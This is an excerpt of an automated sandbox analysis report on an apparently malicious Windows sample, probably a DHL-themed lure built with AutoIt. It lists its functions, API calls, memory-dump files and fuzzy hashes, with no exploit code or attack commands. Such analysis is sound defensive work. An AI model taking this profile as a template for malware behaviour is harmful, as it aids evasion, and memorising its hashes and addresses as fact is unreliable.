                                                                                      • Opcode Fuzzy Hash: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                      • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940ADE7BF9EF48300F108199F808AB312DA30DA11CBA4
                                                                                      Function 00065000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00064C7D: RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                                                                      • _free.LIBCMT ref: 0006506C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction ID: 4ea55c772830af62e29ceacb6bc6d3917b8109e706222c1ad79fc75de2a01364
                                                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction Fuzzy Hash: 900126722047056BE3318F65DC85A9AFBEAFB89370F25051DE18483280EA30A905C6B4
                                                                                      Function 0005E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction ID: 1782a8536c53d766531505b619d84a6c6440cede04705bc4dedab116fc7f5cd2
                                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction Fuzzy Hash: 39F02832510E109AD7353A69DC05BDB379A9F523F7F100716FCA1931D3CB74DA0A86A5
                                                                                      Function 00064C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: e20b186fae7426f337fea71416fabe44fbd4ec59d8a883ab16e5af6a00b39624
                                                                                      • Instruction ID: 26708ee5c6e2203f61225a365d5a523609c0c9fbbf97c60b0b360599b1af7710
                                                                                      • Opcode Fuzzy Hash: e20b186fae7426f337fea71416fabe44fbd4ec59d8a883ab16e5af6a00b39624
                                                                                      • Instruction Fuzzy Hash: A5F0E93160222467DBE15F66DC09F9B37CABF817B1B144121FC1DEA381CA70D80186E0
                                                                                      Function 00063820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                                                                      • Instruction ID: c7a961da7ba74a8eea4a4480a9a8b452bee9e9df7cb7bf2f24276c1d8ab9ce19
                                                                                      • Opcode Fuzzy Hash: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                                                                      • Instruction Fuzzy Hash: E6E0ED31100325AEE6B12AA79C05FDB36CBAB42BB1F090020BC0997882CF20DE0283E0
                                                                                      Function 00034F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034F6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 53b503a3fb90df7fc348535233af26cda23a6626b4848742ca80f959ed399127
                                                                                      • Instruction ID: 9adcd4b3f8b7ee8ccdd952d217ad36e4a9c336483b3eccf453c3211ffb1345c2
                                                                                      • Opcode Fuzzy Hash: 53b503a3fb90df7fc348535233af26cda23a6626b4848742ca80f959ed399127
                                                                                      • Instruction Fuzzy Hash: E1F0A070105741CFDB358F21D490C16B7E8EF0131971889BEE1DA86611C731A844DF00
                                                                                      Function 0009CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CD26
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0009CD19,?,?,?), ref: 0009CC59
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC6E
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$Write
                                                                                      • String ID:
                                                                                      • API String ID: 3847668363-0
                                                                                      • Opcode ID: 4425907bd8f25183dc22d19ae98addd062d82ba5c5e2308f02c4c540d070560b
                                                                                      • Instruction ID: baa6efb2bffc7c73dcae5b418c728bf1cedc8f2703017b874388c494a555f7b3
                                                                                      • Opcode Fuzzy Hash: 4425907bd8f25183dc22d19ae98addd062d82ba5c5e2308f02c4c540d070560b
                                                                                      • Instruction Fuzzy Hash: 8EE06576800704EFDB219F46DD00C9ABBF8FF85350710852FE955C2511D375AA14DB60
                                                                                      Function 00032DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 541455249-0
                                                                                      • Opcode ID: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                                                                      • Instruction ID: f582a338eb0050ae55fc1dab996f65211cc83c5b4fddbce87fb11994a618118f
                                                                                      • Opcode Fuzzy Hash: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                                                                      • Instruction Fuzzy Hash: D0E0CD72A001245BD7119358DC05FDA77DDDFC8790F044071FD0DD7249DA64AD808650
                                                                                      Function 00032B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00033837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                        • Part of subcall function 0003D730: GetInputState.USER32 ref: 0003D807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                                                                        • Part of subcall function 000330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0003314E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      • Opcode ID: 09fb253e281ac7c8a76b861301ba2344c1f196ad4fe83bd39c59c0d093faf469
                                                                                      • Instruction ID: 74228affa896e8904d69a360b7c78510c11a557d403032cfed734fd4a9d89c21
                                                                                      • Opcode Fuzzy Hash: 09fb253e281ac7c8a76b861301ba2344c1f196ad4fe83bd39c59c0d093faf469
                                                                                      • Instruction Fuzzy Hash: 7DE0CD3170424417C60ABB74B8929FDF75D9BD1351F40153EF186831B3DF6886454351
                                                                                      Function 0007039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                                                                      • Instruction ID: 4c96fc605a304f0ca85a1b9a6a37042152215434a045206b9e0219f59f331e3f
                                                                                      • Opcode Fuzzy Hash: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                                                                      • Instruction Fuzzy Hash: F9D06C3204010DBBEF028F85DD06EDA3BAAFB48714F014000FE1856020C736E821AB90
                                                                                      Function 00031CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00031CBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      • Opcode ID: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                                                                      • Instruction ID: 3242a3fac7d8a8b178428c2f699ea7ad2ea5ecea0125562e59f0f1b837acabc8
                                                                                      • Opcode Fuzzy Hash: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                                                                      • Instruction Fuzzy Hash: 5AC04836280304AAF2148B80AC4AF507764A348B10F048001F689A99E382E628A1AA54
                                                                                      Function 000A744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00035745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 000A76DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 2a796d901d8c87dee951d8a3e54a0b085730ca1bf9139d1c9abeb2a317d65c1f
                                                                                      • Instruction ID: 37eb4c6ece485dceaf6af09d13cd395d71dc1011fbdab4b5cea77db132a56f11
                                                                                      • Opcode Fuzzy Hash: 2a796d901d8c87dee951d8a3e54a0b085730ca1bf9139d1c9abeb2a317d65c1f
                                                                                      • Instruction Fuzzy Hash: 598194306087019FCB15EF64C891BADB7E5BF89314F04852DF8895B2A2DB70ED45CB52
                                                                                      Function 00036246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,000724E0), ref: 00036266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                      • Instruction ID: 5cd43ea60c34be626aaa3b2757217ea7d6e7a30fd1b44f66c99dcd2c8af2bb3f
                                                                                      • Opcode Fuzzy Hash: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                      • Instruction Fuzzy Hash: 6EE0B675400B01EFD3324F1AE804412FBF9FFE23613218A2ED1E692660D3B158868F50
                                                                                      Function 0117ABE0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 0117ABF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: c680c93a1d123fa5a6a6c2c62b8671a3dfe3b80c8b0ea19ac36e006822bdc12c
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 0DE0E67498410DEFDB00EFB4DA4969E7FB4EF04301F100161FD01D2281D7309D508A62

                                                                                      Non-executed Functions

                                                                                      Function 000C9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000C961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 000C969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C96C9
                                                                                      • SendMessageW.USER32 ref: 000C96F2
                                                                                      • GetKeyState.USER32(00000011), ref: 000C978B
                                                                                      • GetKeyState.USER32(00000009), ref: 000C9798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C97AE
                                                                                      • GetKeyState.USER32(00000010), ref: 000C97B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C97E9
                                                                                      • SendMessageW.USER32 ref: 000C9810
                                                                                      • SendMessageW.USER32(?,00001030,?,000C7E95), ref: 000C9918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000C992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000C9941
                                                                                      • SetCapture.USER32(?), ref: 000C994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C99AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000C99BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C99D6
                                                                                      • ReleaseCapture.USER32 ref: 000C99E1
                                                                                      • GetCursorPos.USER32(?), ref: 000C9A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9A80
                                                                                      • SendMessageW.USER32 ref: 000C9AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9AEB
                                                                                      • SendMessageW.USER32 ref: 000C9B1A
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000C9B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000C9B4A
                                                                                      • GetCursorPos.USER32(?), ref: 000C9B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9B75
                                                                                      • GetParent.USER32(?), ref: 000C9B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9BFA
                                                                                      • SendMessageW.USER32 ref: 000C9C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000C9CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9CDE
                                                                                      • SendMessageW.USER32 ref: 000C9D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000C9D82
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C9E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F$p]
                                                                                      • API String ID: 3429851547-2918536491
                                                                                      • Opcode ID: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                                                                      • Instruction ID: 4ae8538a34313ba13e026138447850de0aabe5afe67c5335bb0757d0073c06b1
                                                                                      • Opcode Fuzzy Hash: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                                                                      • Instruction Fuzzy Hash: BA427834208201AFEB25CF28CD88FAEBBE5FF49314F14061DF699976A1D771A960CB51
                                                                                      Function 000C4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 000C48F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 000C4908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 000C4927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 000C494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 000C495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 000C497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 000C49AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 000C49D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 000C4A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A7E
                                                                                      • IsMenu.USER32(?), ref: 000C4A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C4B94
